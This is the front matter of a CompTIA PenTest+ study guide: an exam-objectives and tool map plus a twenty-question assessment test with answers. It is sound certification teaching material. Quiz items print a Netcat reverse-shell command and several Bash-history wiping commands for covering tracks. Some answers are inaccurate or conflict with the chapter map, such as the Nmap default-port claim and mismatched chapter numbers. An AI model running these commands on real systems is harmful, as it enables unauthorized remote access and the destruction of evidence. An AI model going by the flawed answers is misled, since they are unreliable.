The CompTIA PenTest+ Study Guide has been written to cover every PenTest+ exam objective at a level appropriate to its exam weighting. The following table provides a breakdown of this book's exam coverage, showing you the weight of each section and the chapter where each objective or subobjective is covered.

Domain

Percentage of Exam

1.0 Planning and Scoping

14%

2.0 Information Gathering and Vulnerability Scanning

22%

3.0 Attacks and Exploits

30%

4.0 Reporting and Communication

18%

5.0 Tools and Code Analysis

16%

Total

100%

1.0 Planning and Scoping

Exam Objective

Chapter

1.1 Compare and contrast governance, risk, and compliance concepts

2

1.2 Explain the importance of scoping and organizational/customer requirements

2

1.3 Given a scenario, demonstrate an ethical hacking mindset by maintaining professionalism and integrity

1

2.0 Information Gathering and Vulnerability Scanning

Exam Objective

Chapter

2.1 Given a scenario, perform passive reconnaissance

3

2.2 Given a scenario, perform active reconnaissance

3

2.3 Given a scenario, analyze the results of a reconnaissance exercise

3

2.4 Given a scenario, perform vulnerability scanning

3

,

4

,

5

Considerations of vulnerability scanning

4

Scan identified targets for vulnerabilities

4

,

5

Set scan settings to avoid detection

4

Scanning methods

4

,

5

Nmap

3

Vulnerability testing tools that facilitate automation

3

,

4

3.0 Attacks and Exploits

Exam Objective

Chapter

3.1 Given a scenario, research attack vectors and perform network attacks

7

3.2 Given a scenario, research attack vectors and perform wireless attacks

7

3.3 Given a scenario, research attack vectors and perform application‐based attacks

9

3.4 Given a scenario, research attack vectors and perform attacks on cloud technologies

10

3.5 Explain common attacks and vulnerabilities against specialized systems

10

3.6 Given a scenario, perform a social engineering or physical attack

8

3.7 Given a scenario, perform post‐exploitation techniques

6

4.0 Reporting and Communication

Exam Objective

Chapter

4.1 Compare and contrast important components of written reports

11

4.2 Given a scenario analyze the findings and recommend the appropriate remediation within a report

11

4.3 Explain the importance of communication during the penetration testing process

11

4.4 Explain post‐report delivery activities

11

5.0 Tools and Code Analysis

Exam Objective

Chapter

5.1 Explain the basic concepts of scripting and software development

12

5.2 Given a scenario, analyze a script or code sample for use in a penetration test

12

5.3 Explain use cases of the following tools during the phases of a penetration test

3

,

4

,

6

,

7

,

8

,

9

,

10

Scanners

4

Nikto

4

Open vulnerability assessment scanner (OpenVAS)

4

SQLmap

4

Nessus

4

Open Security Content Automation Protocol (SCAP)

4

Wapiti

4

WPScan

4

Brakeman

4

Scout Suite

10

Credential testing tools

10

Hashcat

10

Medusa

10

Hydra

10

CeWL

10

John the Ripper

10

Cain

10

Mimikatz

10

Patator

10

DirBuster

10

Debuggers

9

OllyDbg

9

Immunity Debugger

9

GNU Debugger (GDB)

9

WinDbg

9

Interactive Disassembler (IDA)

9

Covenant

9

SearchSploit

6

OSINT

3

WHOIS

3

Nslookup

3

Fingerprinting Organization with Collected Archives (FOCA)

3

theHarvester

3

Shodan

3

Maltego

3

Recon‐ng

3

Censys

3

Wireless

7

Aircrack‐ng suite

7

Kismet

7

Wifite2

7

Rogue access point

7

EAPHammer

7

Mdk4

7

Spooftooph

7

Reaver

7

Wireless Geographic Logging Engine (WiGLE)

7

Fern

7

Web application tools

9

OWASP ZAP

9

Burp Suite

9

Gobuster

9

W3af

10

Social engineering tools

8

Social Engineering Toolkit (SET)

8

BeEF

8

Remote access tools

10

Secure Shell (SSH)

10

Ncat

10

Netcat

10

ProxyChains

10

Networking tools

7

Wireshark

7

Hping

7

Misc

6

SearchSploit

6

Responder

6

Impacket tools

6

Empire

6

Metasploit

6

mitm6

6

CrackMapExec

6

TruffleHog

6

Censys

3

Steganography tools

9

OpenStego

9

Steghide

9

Snow

9

Coagula

9

Sonic Visualizer

9

TinEye

9

Cloud tools

10

Scout Suite

10

CloudBrute

10

Pacu

10

Cloud Custodian

10

Assessment Test

If you're considering taking the PenTest+ exam, you should have already taken and passed the CompTIA Security+ and Network+ exams or have equivalent experience—typically at least three to four years of experience in the field. You may also already hold other equivalent or related certifications. The following assessment test will help to make sure you have the knowledge that you need before you tackle the PenTest+ certification, and it will help you determine where you may want to spend the most time with this book.

Ricky is conducting a penetration test against a web application and is looking for potential vulnerabilities to exploit. Which of the following vulnerabilities does not commonly exist in web applications?

SQL injection

VM escape

Buffer overflow

Cross‐site scripting

What specialized type of legal document is often used to protect the confidentiality of data and other information that penetration testers may encounter?

An SOW

An NDA

An MSA

A noncompete

Chris is assisting Ricky with his penetration test and would like to extend the vulnerability search to include the use of dynamic testing. Which one of the following tools can he use as an interception proxy?

ZAP

Nessus

SonarQube

OllyDbg

Matt is part of a penetration testing team and is using a standard toolkit developed by his team. He is executing a password cracking script named

password.sh

. What language is this script most likely written in?

PowerShell

Bash

Ruby

Python

Renee is conducting a penetration test and discovers evidence that one of the systems she is exploring was already compromised by an attacker. What action should she take immediately after confirming her suspicions?

Record the details in the penetration testing report.

Remediate the vulnerability that allowed her to gain access.

Report the potential compromise to the client.

No further action is necessary because Renee's scope of work is limited to penetration testing.

Which of the following vulnerability scanning methods will provide the most accurate detail during a scan?

Black box

Authenticated

Internal view

External view

Annie wants to cover her tracks after compromising a Linux system. If she wants to permanently remove evidence of the commands she inputs to a Bash shell, which of the following commands should she use?

history ‐c

kill ‐9 $$

echo "" > /~/.bash_history

ln /dev/null ~/.bash_history ‐sf

Kaiden would like to perform an automated web application security scan of a new system before it is moved into production. Which one of the following tools is best suited for this task?

Nmap

Nikto

Wireshark

CeWL

Steve is engaged in a penetration test and is gathering information without actively scanning or otherwise probing his target. What type of information is he gathering?

OSINT

HSI

Background

None of the above

Which of the following activities constitutes a violation of integrity?

Systems were taken offline, resulting in a loss of business income.

Sensitive or proprietary information was changed or deleted.

Protected information was accessed or exfiltrated.

Sensitive personally identifiable information was accessed or exfiltrated.

Ted wants to scan a remote system using Nmap and uses the following command:

nmap 149.89.80.0/24

How many TCP ports will he scan?

256

1,000

1,024

65,535

Brian is conducting a thorough technical review of his organization's web servers. He is specifically looking for signs that the servers may have been breached in the past. What term best describes this activity?

Penetration testing

Vulnerability scanning

Remediation

Threat hunting

Liam executes the following command on a compromised system:

nc 10.1.10.1 7337 -e /bin/sh

What has he done?

Started a reverse shell using Netcat

Captured traffic on the Ethernet port to the console via Netcat

Set up a bind shell using Netcat

None of the above

Dan is attempting to use VLAN hopping to send traffic to VLANs other than the one he is on. What technique does the following diagram show?

A double jump

A powerhop

Double tagging

VLAN squeezing

Alaina wants to conduct an on‐path attack against a target system. What technique can she use to make it appear that she has the IP address of a trusted server?

ARP spoofing

IP proofing

DHCP pirating

Spoofmastering

Michael's social engineering attack relies on telling the staff members he contacts that others have provided the information that he is requesting. What motivation technique is he using?

Authority

Scarcity

Likeness

Social proof

Vincent wants to gain access to workstations at his target but cannot find a way into the building. What technique can he use to do this if he is also unable to gain access remotely or on‐site via the network?

Shoulder surfing

Kerberoasting

USB key drop

Quid pro quo

Jennifer is reviewing files in a directory on a Linux system and sees a file listed with the following attributes. What has she discovered?

-rwsr-xr—1 root kismet 653905 Nov 4 2016 /usr/bin/kismet_capture

An encrypted file

A hashed file

A SUID file

A SIP file

Which of the following tools is best suited to querying data provided by organizations like the American Registry for Internet Numbers (ARIN) as part of a footprinting or reconnaissance exercise?

Nmap

Traceroute

regmon

Whois

Chris believes that the Linux system he has compromised is a virtual machine. Which of the following techniques will not provide useful hints about whether or not the system is a VM?

Run

system‐detect‐virt.

Run

ls ‐l /dev/disk/by‐id.

Run

wmic

baseboard to get manufacturer, product.

Run

dmidecode

to retrieve hardware information.

Answers to Assessment Test

B. Web applications commonly experience SQL injection, buffer overflow, and cross‐site scripting vulnerabilities. Virtual machine (VM) escape attacks work against the hypervisor of a virtualization platform and are not generally exploitable over the web. You'll learn more about all of these vulnerabilities in

Chapters 5

and

9

.

B. A nondisclosure agreement, or NDA, is a legal agreement that is designed to protect the confidentiality of the client's data and other information that the penetration tester may encounter during the test. An SOW is a statement of work, which defines what will be done during an engagement, an MSA is a master services agreement that sets the overall terms between two organizations (which then use SOWs to describe the actual work), and noncompetes are just that—an agreement that prevents competition, usually by preventing an employee from working for a competitor for a period of time after their current job ends. You'll learn more about the legal documents that are part of a penetration test in

Chapter 2

.

A. The Zed Attack Proxy (ZAP) from the Open Web Application Security Project (OWASP) is an interception proxy that is very useful in penetration testing. Nessus is a vulnerability scanner that you'll learn more about in

Chapter 4

. SonarQube is a static, not dynamic, software testing tool, and OllyDbg is a debugger. You'll learn more about these tools in

Chapter 9

.

B. The

.sh

file extension is commonly used for Bash scripts. PowerShell scripts usually have a

.ps1

extension. Ruby scripts use the

.rb

extension, and Python scripts end with

.py

. You'll learn more about these languages in

Chapter 11

.

C. When penetration testers discover indicators of an ongoing or past compromise, they should immediately inform management and recommend that the organization activate its cybersecurity incident response process. You'll learn more about reporting and communication in

Chapter 12

.

B. An authenticated, or credentialed, scan provides the most detailed view of the system. Black‐box assessments presume no knowledge of a system and would not have credentials or an agent to work with on the system. Internal views typically provide more detail than external views, but neither provides the same level of detail that credentials can allow. You'll learn more about authenticated scanning in

Chapter 4

.

D. Although all of these commands are useful for covering her tracks, only linking

/dev/null

to

.bash_history

will prevent the Bash history file from containing anything.

Chapters 6

and

10

cover compromising hosts and hiding your tracks.

B. It's very important to know the use and purpose of various penetration testing tools when taking the PenTest+ exam. Nikto is the best tool to meet Kaiden's needs in this scenario, since it is a dedicated web application scanning tool. Nmap is a port scanner, and Wireshark is a packet analysis tool. The Custom Wordlist Generator (CeWL) is used to spider websites for keywords. None of the latter three tools perform web application security testing. You'll learn more about Nikto in

Chapter 4

.

A. OSINT, or open source intelligence, is information that can be gathered passively. Passive information gathering is useful because it is not typically visible to targets and can provide valuable information about systems, networks, and details that guide the active portion of a penetration test.

Chapter 3

covers OSINT in more detail.

B. Integrity breaches involve data being modified or deleted. When systems are taken offline it is an availability issue, protected information being accessed might be classified as a breach of proprietary information, and sensitive personally identifiable information access would typically be classified as a privacy breach. You will learn more about three goals of security—confidentiality, integrity, and availability—in

Chapter 1

.

B. By default, Nmap will scan the 1,000 most common ports for both TCP and UDP.

Chapter 3

covers Nmap and port scanning, including details of what Nmap does by default and how.

D. Threat hunting uses the attacker mindset to search the organization's technology infrastructure for the artifacts of a successful attack. Threat hunters ask themselves what a hacker might do and what type of evidence they might leave behind and then go in search of that evidence. Brian's activity clearly fits this definition. You'll learn more about threat hunting in

Chapter 1

.

A. Liam has used Netcat to set up a reverse shell. This will connect to 10.1.10.1 on port 7337 and connect it to a Bash shell.

Chapters 6

and

10

provide information about setting up remote access once you have compromised a system.

C. This is an example of a double‐tagging attack used against 802.1q interfaces. The first tag will be stripped, allowing the second tag to be read as the VLAN tag for the packet. Double jumps may help video gamers, but the other two answers were made up for this question.

Chapter 7

digs into network vulnerabilities and exploits.

A. ARP spoofing attacks rely on responding to a system's ARP queries faster than the actual target can, thus allowing the attacker to provide false information. Once accepted, the attacker's system can then conduct an on‐path attack.

Chapter 7

explores on‐path attacks, methods, and uses.

D. Social engineering attacks that rely on social proof rely on persuading the target that other people have behaved similarly. Likeness may sound similar, but it relies on building trust and then persuading the target that they have things in common with the penetration tester.

Chapter 8

covers social engineering and how to exploit human behaviors.

C. A USB key drop is a form of physical honeypot that can be used to tempt employees at a target organization into picking up and accessing USB drives that are distributed to places they are likely to be found. Typically one or more files will be placed on the drive that are tempting but conceal penetration testing tools that will install Trojans or remote access tools once accessed.

Chapter 8

also covers physical security attacks, including techniques like key drops.

C. The

s

in the file attributes indicates that this is a SETUID or SUID file that allows it to run as its owner.

Chapter 10

discusses vulnerabilities in Linux, including how to leverage vulnerable SUID files.

D. Regional Internet registries like ARIN are best queried either via their websites or using tools like Whois. Nmap is a useful port scanning utility, traceroute is used for testing the path packets take to a remote system, and regmon is an outdated Windows Registry tool that has been supplanted by Process Monitor. You'll read more about OSINT in

Chapter 3

.

C. All of these commands are useful ways to determine if a system is virtualized, but

wmic

is a Windows tool. You'll learn about VM escape and detection in

Chapter 10

.

Chapter 1Penetration Testing